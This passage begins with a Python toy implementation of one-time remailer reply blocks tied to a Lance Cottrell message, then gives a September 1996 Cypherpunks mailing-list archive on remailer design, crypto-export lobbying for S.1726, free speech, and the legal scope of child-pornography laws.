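def keystream_xor(key: bytes, data: bytes) -> bytes:
    # Stand-in stream cipher (assumption: the proposal names no cipher).
    # Acceptable here only because each key encrypts exactly one element.
    stream = hashlib.shake_256(b"enc" + key).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def seal(key: bytes, plaintext: bytes) -> bytes:
    ct = keystream_xor(key, plaintext)
    return ct + hmac.new(key, b"mac" + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> bytes:
    ct, tag = blob[:-32], blob[-32:]
    good = hmac.new(key, b"mac" + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, good):
        raise ReplyBlockError("element failed authentication")
    return keystream_xor(key, ct)


class Remailer:
    def __init__(self, address: str):
        self.address = address
        self.reply_keys = {}  # id -> key: the per-remailer database

    def register(self, rid: bytes, key: bytes) -> None:
        # Step 2. Assumes (id, key) reaches the remailer confidentially.
        self.reply_keys[rid] = key

    def process(self, block):
        # Step 4: strip own element, look up id, decrypt next hop, forget key.
        if not block:
            raise ReplyBlockError("empty reply block")
        (rid, sealed), rest = block[0], block[1:]
        key = self.reply_keys.get(rid)
        if key is None:
            raise ReplyBlockError("unknown or already used id")
        next_hop = unseal(key, sealed).decode()
        del self.reply_keys[rid]  # nothing left to hand over afterwards
        return next_hop, rest


def build_reply_block(path, final_address: str):
    # Steps 1-3, done by Alice. `path` is the remailer list in reply order.
    block = []
    for i, node in enumerate(path):
        rid = secrets.token_bytes(20)   # 160-bit random id
        key = secrets.token_bytes(32)
        node.register(rid, key)
        nxt = path[i + 1].address if i + 1 < len(path) else final_address
        block.append((rid, seal(key, nxt.encode())))
    return path[0].address, block


def deliver(network, first_hop: str, block, message: bytes):
    # Bob's reply: each remailer consumes one element and names the next hop.
    hop = first_hop
    while hop in network:
        hop, block = network[hop].process(block)
    return hop, message  # hop is now the final mailbox address


def burn(path, block) -> None:
    # Alice, nervous: push each element through its own remailer so that
    # every stored key is deleted and the return path no longer exists.
    for node, element in zip(path, block):
        node.process([element])


if __name__ == "__main__":
    nodes = [Remailer(f"remailer{i}.example.invalid") for i in range(3)]
    net = {n.address: n for n in nodes}
    first, block = build_reply_block(nodes, "alice@example.invalid")
    print(deliver(net, first, block, b"reply from Bob"))
    try:
        deliver(net, first, block, b"replay")
    except ReplyBlockError as exc:
        print("second use refused:", exc)
```

The `reply_keys` table is the cost Lance Cottrell points at in his reply: every remailer holds one entry per outstanding reply block until that block is used or burned. Unlike a deletable log of serial numbers, an entry that has been removed cannot be restored by the operator, because the key itself is gone.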
From jimbell at pacifier.com Tue Sep 10 21:47:26 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 12:47:26 +0800 Subject: Guns Don't Kill People, IP Does Message-ID: <199609110201.TAA29131@mail.pacifier.com> At 10:37 AM 9/10/96 -0400, Mike Fletcher wrote: >> Sorry for my bad English, perhaps I got misunderstood. >> Would you run a WWW site where the (say there where some) >> terrorist who shot down (a wild assumtion too) the TWA plane >> claiming it was right and all people should fight 'evil >> America'. Because of your web site there are other bomb >> attacks in the US (or somewhere else, the country is not that >> important) (although it's of course impossible to proove that >> this bombings are 'inspired' by your web site). >> Would you support the freedom of speech in this way ? > > Call me crazy, but maybe if "terrorists" had a web page to >use to get out their particular message they wouldn't need to go out >and blow things up to get noticed (well, except for the ones in it >just for the sake of blowing things up). That's the RIGHT answer! Historically, governments have wanted to deny dissident-type people the freedom to spread word of their opposition to the rest of the population. This just made the problem worse, ensuring that they'd have to use violence to get the word out. The problem fed on itself until these people became "terrorists." The best way to stop this cycle is to allow these people to talk to us, and the web page is the modern form of talking. Be _very_ suspicious of anybody who wants to continue to isolate people he calls "terrorists." 
Jim Bell
jimbell at pacifier.com

From loki at infonex.com Tue Sep 10 21:56:35 1996
From: loki at infonex.com (Lance Cottrell)
Date: Wed, 11 Sep 1996 12:56:35 +0800
Subject: One Time Reply Blocks (was Re: strengthening remailerprotocols)
In-Reply-To: <199609101730.KAA22130@netcom6.netcom.com>
Message-ID:

At 10:33 AM -0700 9/10/96, Bill Frantz wrote:
>At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote:
>>At 4:19 PM -0700 9/9/96, Bill Frantz wrote:
>>>To paraphrase John Von Neumann, any system which uses reply blocks is in a
>>>state of sin. By this I mean that if there is a chain pointing at you, a
>>>sufficiently powerful attacker can walk down that chain and find you.
>>>
>>>Given that, I will join the state of sin by proposing a mechanism which
>>>will allow Alice to receive a reply from Bob, but change her mind at any
>>>time. The basic idea is to have a one-time reply block which either Bob or
>>>Alice can send to. If Alice thinks that too much time has elapsed, and
>>>powerful enemies are walking down her reply block chain, she can send
>>>herself a reply and break the chain. (She might send a reply thru each
>>>link in the chain to break all the links.)
>>
>>The reason the message is not resendable is that the remailers keep track
>>of the serial number of that header. If forced, the log of serial numbers
>>could be deleted, and the operator would process the message.
>>
>>Unless you are assuming some key archived by each remailer for the reply
>>block, then I think it will be possible to repair the chain.
>
>I was thinking of storing a reply-key in each remailer. The protocol might
>go something like this (straw man proposal):
>
>(1) Alice picks n random ids (say 160 bits or so) and n random keys.
>(2) Alice sends the combination to remailer[i], i=0,n-1.
>(3) Alice builds a reply block which consists of the remailer return path,
>each element encyphered with the appropriate key and sends it to Bob.
>(4) When a remailer processes a reply block element, it removes it from the
>reply block, looks up the id in its database, decrypts the address of the
>next hop, removes the database element and forwards the message.
>
>If Alice becomes nervous, she sends n "replies" thru each remailer to cause
>the return path to be destroyed.
>

It is a good idea, but it does involve another whole level of
infrastructure. I am not at all sure that message pools are not a better
system. Your suggestion requires the client to do a lot of work, and for the
remailers to store many keys for indefinite periods.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
	--Nietzsche
----------------------------------------------------------

From chuck at nova1.net Tue Sep 10 22:27:48 1996
From: chuck at nova1.net (Chuck Thompson)
Date: Wed, 11 Sep 1996 13:27:48 +0800
Subject: Child Porn as Thoughtcrime
Message-ID: <1.5.4.32.19960911030546.006c224c@mail.nova-net.net>

At 04:09 PM 9/10/96 -0700, you wrote:
>>From: tcmay at got.net
>>
>>My point is this: For anyone who claims that "thoughtcrime" is something
>>the Evil Empire specialized in, i.e., totalitarian communist regimes, look
>>to the enforcement of laws about what can be viewed or accessed from the
>>United States. Thoughtcrime.
>>.........................................................................
>> >> >>Those laws obviously (to me) don't have all that much to do with legality nor >>all that much with thought, either; but more with a government aiming to >>"looking good" in front of an audience of voters, presenting an image of >>being more moral, or "better-than-thou" - in front of other nations, etc.; >>that is, to gain favor, and therefore political support, from the Citizen >>Units by sounding like Mother Superior/fatherly figures who are going to look >>after All The Little Children (tm), plus all the similarly weak & >>dispossessed. Let's see if I understand you correctly. The anti-child porn advocates are only interested in votes and positioning themselves as more moral or "better-than-thou"... >>This posturing gives all the un-selfconfident people someone to look up to, >>even if they don't really get anything (their memories being too short to >>notice the failed promises, lack of follow-through, and blatant >>inconsistencies, not to mention the 'legal' crimes committed along the way). in order to provide an icon for the "citizen units" to worship... >>Many people seek after sympathy towards their feelings (present and/or future >>pain) more than to be respected for the ability to think. because they are too stupid to think for themselves, and therefore are reduced to going on their intuition... >>I imagine this >>develops into a reduced sympathy towards certain kinds of thought or towards >>thinking per se, eventually, promoting a general atmosphere of tolerance for >>offenses like "thoughtcrimes". causing them to be unsympathetic to thinking? What in the devil are you trying to say? Maybe I'm one of those stupid citizen units. I just don't get it - I'd like to, but I don't. How about rephrasing your comments so that us average citizen units can understand your wisdom. 
>> >>And of course anyone who is free to think about anything & everything (who >>could therefore potentially think about what everybody else has forgotten) >>will seem dangerous to those who wish to appear to be in total, beneficent >>control. If there is logic to the wind-up, it escapes me. It seems to me that the appearance of being in total control (dictatorship) is the last thing any politician in this country would want to be seen (seen being the operative word) as attempting. Is this message spoofed from that juno kid? Regards, Chuck Thompson From dlv at bwalk.dm.com Tue Sep 10 22:42:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 13:42:07 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > I didn't call for your "expulsion." No one has been expelled in four years > of the list's existence. However Tim has been complaining about my postings to various people I know and respect. (I stopped respecting Tim years ago.) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at eff.org Tue Sep 10 23:14:29 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 14:14:29 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: I'll try to respond to some of Tim's questions. Keep in mind it's late; I'm about to go to sleep; I don't have my references here. I welcome corrections. -Declan On Tue, 10 Sep 1996, Timothy C. May wrote: > Q: Is a drawing of a child engaging in a sexual act an illegal item? Under the original Hatch bill, yes. Certainly under the revised one. Of course, Hatch's proposal goes even farther. There's no "sex act" requirement. Judy Krug from the ALA testified about this, opposing Bruce Taylor. > Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old > illegal? Even under the original Hatch bill, yes. 
> Q: Is writing a story about a child having sex illegal? Probably not. > Q: Is a collage of images of little girls (or boys, one presumes) in > swimsuits, with apparent salacious intent, illegal? Under the Knox decision, yes. (Dancing girls in leotards are verboten.) > Q: Is accessing a Web site having nude or sexually-related images of > children who are of legal sexual age in the site's country--but not in the > accessor's country--illegal? If you're in the U.S. and are accessing photos from Sweden, yes. But child porn laws have been harmonized, so this may be an unlikely scenario. There is also a treaty I talk about in my August Internet Underground cover story: Not so, says Bruce Taylor, the chief architect of the CDA and a professional cyber-scaremonger. The former Federal porn-prosecutor believes that "not all censorship is bad." "Foreign countries have an obligation to restrict obscenity and child pornography on the Internet by the treaty of 1911," says Taylor. "It's an agreement between the states to cooperate and to use international laws to prosecute obscenity." And to Taylor, books and copies of Penthouse magazine can be obscene. > Q: Is it legal to have photographs of one's own children in a nude state? > (E.g., playing in a backyard pool, at the beach, etc.) Does it become > illegal to let others see these photographs? How about putting them on a > Web site? You can be harassed by police for it -- reference the Cambridge case linked to from http://joc.mit.edu/. I think, though I don't have cites, that other parents have been prosecuted for this. > Q: Is a crime committed if a teenaged girls takes a photograph of _herself_ > and shows it to others? To adults? Or if she writes a salacious story about > herself or her friends? Or if she just invents it all? Not sure. Perhaps others can help? > (And as to the obscenity laws, which part of "Congress shall make no law" > did the readers of the First Amendment miss? 
I realize this is a > longstanding topic of discussion, with various famous cases (Miller, > Hustler, etc.), but it remains a mystery to me.) Ah. "Obscenity" isn't speech! // declan at eff.org // I do not represent the EFF // declan at well.com // From dlv at bwalk.dm.com Tue Sep 10 23:14:58 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 14:14:58 +0800 Subject: Harry Browne a cryptographer In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu> Message-ID: Will Day writes: > > Browne said he formed his attitude toward government when he entered the > >U.S. Army three years after high school and became a cryptographer. > > The article didn't say anything more about his cryto past.. ... but we know his attitude toward gubment. Instead of advocating violent overthrow of all gubments, the fucking statist is running for president. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at eff.org Tue Sep 10 23:25:10 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 14:25:10 +0800 Subject: Child Porn as Thoughtcrime In-Reply-To: Message-ID: >From fight-censorship archives... -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // ADDITIONAL ANSWER: Because "child pornography" as defined in the governing Supreme Court case (Ferber) sweeps far more broadly than "obscenity" ever did (to the point that even scholars who have supported controls on the latter attacked what the Supreme Court did with the former). For example, although the issues were not resolved, the case revealed that some members of the Supreme Court believe that medical doctors, anthropologists, journalists covering wars or working for the National Geographic, or legislators working on new censorship legislation might all be constitutionally prosecuted for possessing any photographic images of naked children. 
Therefore, we need to be extremely careful about any casual acceptance of the proposition that "Of course, child pornography can be banned." What we actually mean is, "Of course, one can outlaw the use of children in obscene performances." Without wanting to sound too legalistic about all this, if we don't stay alert we are going to find that a significant part of the suppression work sought to be done by "indecency" can be done by "child pornography." ******* Professor Eric M. Freedman Hofstra University School of Law Hempstead, N.Y. 11550 Tel. (516)-463-5167 Fax (516)-560-7676 LAWEMF at Vaxc.Hofstra.edu ******** From shabbir at vtw.org Wed Sep 11 00:30:14 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Wed, 11 Sep 1996 15:30:14 +0800 Subject: ALERT: Call the Commerce committee! The White House is fighting us! (9/10/96) Message-ID: <199609110442.AAA10980@panix3.panix.com> ======================================================================== SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE OFFICES ARE RECEIVING 'LOTS OF CALLS' MAKE A CALL TO THE COMMERCE COMMITTEE September 11, 1996 Please widely redistribute this document with this banner intact until September 30, 1996 ________________________________________________________________________ CONTENTS The Latest News What You Can Do Now Background / What To Expect This Week Description of S.1726, Pro-CODE Bill Chronology of Pro-Crypto Legislation For More Information / Supporting Organizations ________________________________________________________________________ THE LATEST NEWS Sometimes things work out better than imagined. This was the feeling tonight as I waded through my email from people all over the country that called the commerce committee. 
This was the feeling as I heard from visitors to one Senator's office who, while waiting for a few minutes in the lobby, listened to the receptionist take two quick calls from netizens calling about the bill. Receptionist, cutting the caller off: "S.1726? Yes, I'll pass that along to the Senator, thanks. We've been getting a lot of calls." Another netizen emailed us saying that he also called his Representative. It turns out this Rep. has some friends who have co-sponsored HR 3011, the House version of Pro-CODE. The calls and elevated publicity from this phone campaign have convinced him to consider co-sponsoring HR 3011. This is great, but our success has mobilized the anti-crypto forces into action as well. The Clinton Administration, who has long opposed the right of citizens to use non-Clipper encryption, has begun working behind the scenes to make sure that the vote on Pro-CODE (S.1726) never happens. To have the Senate Commerce committee go on record that encryption exports should be loosened, against the will of the Administration, would be an embarrassment to the White House. They have begun pushing hard to pressure Democratic Commerce Committee members to put the brakes on the bill, and do everything they can to prevent the vote this Thursday. To see the business community, the industry, and the public line up the Administration would be extremely hard to take and still seem credible. It's crucial that we continue to make noise and ring those phones. By pulling enough favors with members of the Senate Commerce Committee, it's possible that the White House could prevent this vote from happening. WE MUST NOT LET THAT HAPPEN. Appropriately forward this to everyone you know until the expiration listed above. Go to work, bug your neighbor in the cubicle or office next to you. Have they called yet? Bug them until they do. Call the rest of the members you haven't gotten around to yet. And don't forget to sign the petition at http://www.crypto.com/petition/ ! 
[Rest of alert is the same from last time]

________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and urge
them to pass S.1726 out of committee without amendments. (This is also
known as a "clean" bill.) Any opportunity for amendments (even if they are
good) opens us up to the possibility of hostile amendments that could
restrict the use of encryption even further than today's abysmal state.
It could even prohibit the use of encryption without Clipper Chip-like key
'escrow' technology, which includes built-in surveillance and monitoring
functionality.

1. Call/Fax the members of the Senate Commerce committee and urge them to
   pass S.1726 out of committee "cleanly". Do not use email, as it is not
   likely to be looked at in time to make a difference for the markup on
   September 12th.

   Use the sample communique and directory listing below to make it a
   simple TWO MINUTE task.

2. Sign the petition to support strong encryption at
   http://www.crypto.com/petition/ ! Join other cyber-heroes as Phil
   Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
   others who have also signed.

3. Between now and Wed. September 12, it is crucial that you call all
   these members of Congress.

   P ST Name and Address            Phone           Fax
   = == ========================    ==============  ==============
   D SC Hollings, Ernest F.         1-202-224-6121  1-202-224-4293
   D MA Kerry, John F.              1-202-224-2742  1-202-224-8525
   D HI Inouye, Daniel K.           1-202-224-3934  1-202-224-6747
   D KY Ford, Wendell H.            1-202-224-4343  1-202-224-0046
   D WV Rockefeller, John D.        1-202-224-6472  1-202-224-7665
   D LA Breaux, John B.             1-202-224-4623  1-202-228-2577
   D NV Bryan, Richard H.           1-202-224-6244  1-202-224-1867
   D ND Dorgan, Byron L.            1-202-224-2551  1-202-224-1193
   D NE Exon, J. J.                 1-202-224-4224  1-202-224-5213
   D OR Wyden, Ron*                 1-202-224-5244  1-202-228-2717
   R SD Pressler, Larry*            1-202-224-5842  1-202-224-1259
   R MT Burns, Conrad R.(*sponsor)  1-202-224-2644  1-202-224-8594
   R AK Stevens, Ted                1-202-224-3004  1-202-224-2354
   R AZ McCain, John                1-202-224-2235  1-202-228-2862
   R WA Gorton, Slade               1-202-224-3441  1-202-224-9393
   R MS Lott, Trent*                1-202-224-6253  1-202-224-2262
   R TX Hutchison, Kay Bailey       1-202-224-5922  1-202-224-0776
   R ME Snowe, Olympia              1-202-224-5344  1-202-224-1946
   R MO Ashcroft, John*             1-202-224-6154  1-202-228-0998
   R TN Frist, Bill                 1-202-224-3344  1-202-228-1264
   R MI Abraham, Spencer            1-202-224-4822  1-202-224-8834

   * supporter or cosponsor. The bill also enjoys broad bi-partisan
   support from members not on the committee including Senators Leahy
   (D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL

   You:
   Sen: Hello, Senator Mojo's office!
   You:
   SAY    I'm calling to urge the Senator to pass S.1726, the
   THIS-> Burns/Leahy/Pressler bill, S.1726 when the committee votes on
          it on Thursday. It's critical to the future of privacy,
          security, and electronic commerce on the internet.
   Sen: Ok, thanks!

   IF THEY SAY "The Senator has concerns about the bill", please answer,
   "Please try to work these issues out as it moves to the Senate floor,
   but passage out of committee will send an important signal to the
   Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR
   FROM YOU. Please tell us who you called, and how they sounded. We'll be
   passing this information to folks in D.C. who can help apply pressure
   where needed.

   $ Mail vtw at vtw.org
   Subject: I called so-and-so

   Hey, I called Sen. Mojo. He sounded iffy, call in the reinforcements.
   ^D

6. Forward this to your friends and colleagues in appropriate forums until
   the date of expiration at the top.
Forward a copy of this to your Internet Service Provider as well, and ask them to put the following text in their message of the day (motd), or on their WWW page: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT The U.S. Senate will be voting on a proposal to encourage better security on the Internet on Thu Sep. 12th. Your help is needed to call Congress. See http://www.crypto.com/ for more details. ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ________________________________________________________________________ BACKGROUND / WHAT TO EXPECT THIS WEEK For the past 3 years, Cyber-Rights Activists, citizens, and industry leaders have been working hard to reform US encryption policy. Support has been building behind several legislative proposals this year because they send a clear signal to the Administration about the need for security and privacy in the Information Age. The digital revolution is currently being held hostage by the White House's Cold War restrictions on privacy-enhancing encryption technology. Now, with Congress less than a month away from adjournment, everyone who supports encryption and privacy is working to see this bill leave committee in order to send a clear message to the White House that they are on the wrong side of the encryption issue. Although this bill may not become law this year, its passage out of committee will be a landmark event that will clearly tell the White House that the Congress, the public, and the computer industry care about security and privacy, and need strong, reliable encryption technology in order to make the Internet a viable platform for commerce, education, and democracy. Success for our side is not certain, and the next week is not without risks. On September 12th, the Senate Commerce committee will hold a "markup", where the bill is examined, voted on, and if there are enough votes, passed out of committee. 
Two things could happen: -the committee could pass the bill as written, -the committee could pass the bill with amendments. Any amendments are not likely to be friendly, and in particular, quiet sources have told privacy activists that the Clinton Administration has been readying a legislative assault on your right to use encryption for several weeks now. A Clipper-like amendment could be attached to the bill if our side does not have enough votes to block all amendments. It is crucial that all netizens who consider privacy and security important take a moment to call members of the Commerce Committee right now and urge them to vote S.1726 out of committee without amendments. ________________________________________________________________________ DESCRIPTION OF S.1726, PRO-CODE BILL Privacy-enhancing encryption technology is currently under heavy restrictions kept in place by the White House. Encryption that is currently allowed to be exported is not sufficient to protect confidential information. This policy acquires an "Alice-in-Wonderland" quality when one realizes that strong encryption products are available abroad both for sale and for free download off the Internet. The Pro-CODE Act resolves to: 1. Allow for the *unrestricted* export of "mass-market" or "public-domain" encryption programs, including such products as Pretty Good Privacy and popular World Wide Web browsers. 2. Requires the Secretary of Commerce to allow the less restricted export of other encryption technologies if products of similar strength are generally available outside the United States, roughly up to DES strength. 3. Prohibits the federal government from imposing mandatory key-escrow encryption policies on the domestic market and limiting the authority of the Secretary of Commerce to set standards for encryption products. 
________________________________________________________________________ CHRONOLOGY OF PRO-CRYPTO LEGISLATION 9/12/96 (scheduled) Senate Commerce committee will hold markup of S.1726 and hopefully pass it out of committee with no amendments. 7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. FBI Director Louis Freeh testifies along with many cyber-luminaries. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/072596/ 6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. You can see the photos, read the testimony, and listen to the audio transcript at http://www.crypto.com/events/062696/ 5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would free public-domain encryption software (such as PGP) for export, free much commercial encryption for export, and reduce the government's ability to push Clipper proposals down the throats of an unwilling public. Original sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). 3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills (S.1587/H.R.3011) that significantly relax export restrictions on products with encryption functionality in them, as well as free public domain software such as PGP (Pretty Good Privacy). ________________________________________________________________________ FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS There are many excellent resources online to get up to speed on crypto including the following WWW sites: http://www.crypto.com http://www.privacy.org http://www.eff.org http://www.cdt.org http://www.epic.org http://www.vtw.org Please visit them often. 
The following organizations have signed onto this alert: Center for Democracy and Technology Electronic Frontier Foundation Electronic Privacy Information Center Voters Telecommunications Watch ________________________________________________________________________ End alert ======================================================================== From Skonk at alpha.c2.org Wed Sep 11 00:37:34 1996 From: Skonk at alpha.c2.org (Skonk) Date: Wed, 11 Sep 1996 15:37:34 +0800 Subject: (no subject) Message-ID: <3236424B.12E5@alpha.c2.org> From Adamsc at io-online.com Wed Sep 11 00:43:07 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 11 Sep 1996 15:43:07 +0800 Subject: Movies Message-ID: <19960911054154968.AAA142@IO-ONLINE.COM> On Tue, 10 Sep 1996 13:35:52 +0200 (METDST), Asgaard wrote: >> is viewed as being essentially Mexican. (Some great humor, too. And a good >> murder mystery. And a love story. Conspiracy, humor, murder, love...all the >> ingredients of a great story. All three major American races collide, and > >I think the love ingredients, all too common in movies without adding >anything to the real story, are a pain in the behind. I usually channel- >surf during the coitus scene (one in every movie for the last year). "We've just barely managed to escape the transdimensional alien demon spawn. We're bruised and exhausted. Let's make love in this ditch and hope the alien's Nazi henchmen don't find us!" And people say Hollywood retains even a touch of reality. . . # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From tcmay at got.net Wed Sep 11 00:43:20 1996 From: tcmay at got.net (Timothy C. 
May) Date: Wed, 11 Sep 1996 15:43:20 +0800 Subject: Child Porn as Thoughtcrime Message-ID: Declan answers in the affirmative that, yes, nearly all of the examples I cited are indeed crimes. As I well knew, which is why I presented them. (The Jock Sturges case was in SF, the "little girls in leotards" case was only a few years ago, etc.) My point really was not to ask if the examples are illegal but to point out the "thoughtcrime" nature of making it a felony to draw pictures of naked children, when clearly no actual child was ever involved, when no actual person could have been the victim of an actual crime. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From declan at eff.org Wed Sep 11 00:45:56 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 11 Sep 1996 15:45:56 +0800 Subject: Harry Browne a cryptographer In-Reply-To: <199609102028.QAA13808@rom.oit.gatech.edu> Message-ID: Odd. When I spoke with him about crypto and geekstuff -- I thought at length -- for about an hour, he never mentioned it. -Declan On Tue, 10 Sep 1996, Will Day wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Here's an interesting detail from an AP story: > > A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote: > >From: 76060.3222 at CompuServe.COM ("Steve L. 
Dasbach") > >Date: 10 Sep 96 14:32:09 EDT > >Message-Id: <57196.3235C30E at dehnbase.fidonet.org> > >To: LPUS-PRES at dehnbase.fidonet.org (LP business - presidential) > >Subject: APn Article on Harry Browne > > > > By KARIN MILLER > > Associated Press Writer > > FRANKLIN, Tenn. (AP) -- > > > Browne said he formed his attitude toward government when he entered the > >U.S. Army three years after high school and became a cryptographer. > > The article didn't say anything more about his cryto past.. > > === > Will Day * * * * * * * * * * * > willday at rom.oit.gatech.edu HARRY BROWNE FOR PRESIDENT > http://rom.oit.gatech.edu/~willday/ http://www.HarryBrowne96.org/ > OIT, Georgia Tech, Atlanta 30332-0715 * * * * * * * * * * * > =-> Opinions expressed are mine alone and do not reflect OIT policy <-= > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3 > Charset: noconv > > iQCVAwUBMjXPcBDHlOdPw2ZdAQHVZwP7Bd5FJ1Usgq7TIzOGofhuC1ihc687zLg/ > pPxzR5/8DpHj6x7agdLnKyivBROX9aTE616pzgjOfqup+/VWHdxRbChJ/S0twrn0 > QPWOq4hkvrm9ygJlUSzmGMBEv4BeT/IIITlwrGUo7jaMtvemKPHiNnfE3u+Ii6xr > b44iifT6ygg= > =E9oM > -----END PGP SIGNATURE----- > // declan at eff.org // I do not represent the EFF // declan at well.com // From blancw at cnw.com Wed Sep 11 00:49:43 1996 From: blancw at cnw.com (blanc) Date: Wed, 11 Sep 1996 15:49:43 +0800 Subject: FW: Child Porn as Thoughtcrime Message-ID: <01BB9F6A.50D05180@king1-03.cnw.com> From: Blanc, responding to herself (a la Detweiler - NOT) >Many people seek after sympathy towards their feelings (present and/or future >pain) more than to be respected for the ability to think. I imagine this >develops into a reduced sympathy towards certain kinds of thought or towards >thinking per se, eventually, promoting a general atmosphere of tolerance for >offenses like "thoughtcrimes". ................................................................ This statement is entirely wrong and totally false. 
What I really meant to say, rather than "tolerance for offenses like...", was that there is created an atmosphere which is tolerant towards classifying certain kinds of thinking as "thought crimes". And once it is allowed that some types of thoughts, or some types of thinking, are classifiable as criminally offensive, I expect most anyone on this list can extrapolate the consequences of such a development upon the collective conscience. .. Blanc From jimbell at pacifier.com Wed Sep 11 00:58:44 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 15:58:44 +0800 Subject: Crypto Anachy MUD Message-ID: <199609110534.WAA14548@mail.pacifier.com> At 12:01 AM 9/10/96 -0700, Timothy C. May wrote: >At 5:10 AM 9/10/96, Jon Leonard wrote: >>Duncan Frissell wrote: >>> Did anyone make the point (I gave up on the thread) that we already have a >>> great Crypto Anarchy MUD with lots of the coding already done. We call it >>> the Internet. Digital cash, strong crypto, remailers, everything. >> >>Tim May expressed doubt that it was worth the effort: Not much easier >>than the real thing, and not as good. That's the closest to your point, >>I think. >.... >>Finally, a MUD has the potential to spread crypto-anarchic ideas to people >>who would not otherwise have considered them. >> >>It may be that I'm wasting my time, but I could come up with some useful >>new crypto protocol too. > >Don't tar me with the "Tim said it was a waste of time" label. Rather, I >said I thought it would be pretty tough to get a reasonable ontology, one >with rich enough behaviors and reasonable incentives and disincentives. >Simulations are an art...they were useful in nuclear war planning, where >the degrees of freedom were constrained, and so on. Jon Leonard made it clear to me that he was planning a human-assisted game/MUD, rather than a computer simulation. His explanation is that it is difficult to implement an unbiased simulation, because it is difficult to "simulate" a human. 
But putting people controlling characters into the equation restores the "human element" which arguably will make the results more realistic. Makes sense to me. The one item I suggested was that instead of people controlling individual characters in this MUD, they control a "weighted character" whose weight depends on the number of people of that type in the society. After all, in the path towards a crypto anarchy-type situation, people will naturally have to migrate away from government-oriented solutions, and towards other jobs. Some will be killed, some will retire, some will switch jobs, etc. Turning such a group into a weighted character would allow their number to reflect societal changes more quantitatively than individual characters. Jim Bell jimbell at pacifier.com From tcmay at got.net Wed Sep 11 01:01:17 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 16:01:17 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote: >tcmay at got.net (Timothy C. May) writes: >> I didn't call for your "expulsion." No one has been expelled in four years >> of the list's existence. > >However Tim has been complaining about my postings to various people I know >and respect. (I stopped respecting Tim years ago.) And who might these people be? I suggest you name them, as I have not even mentioned your name to anyone. You don't rate a complaint from me. --TCM We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway."
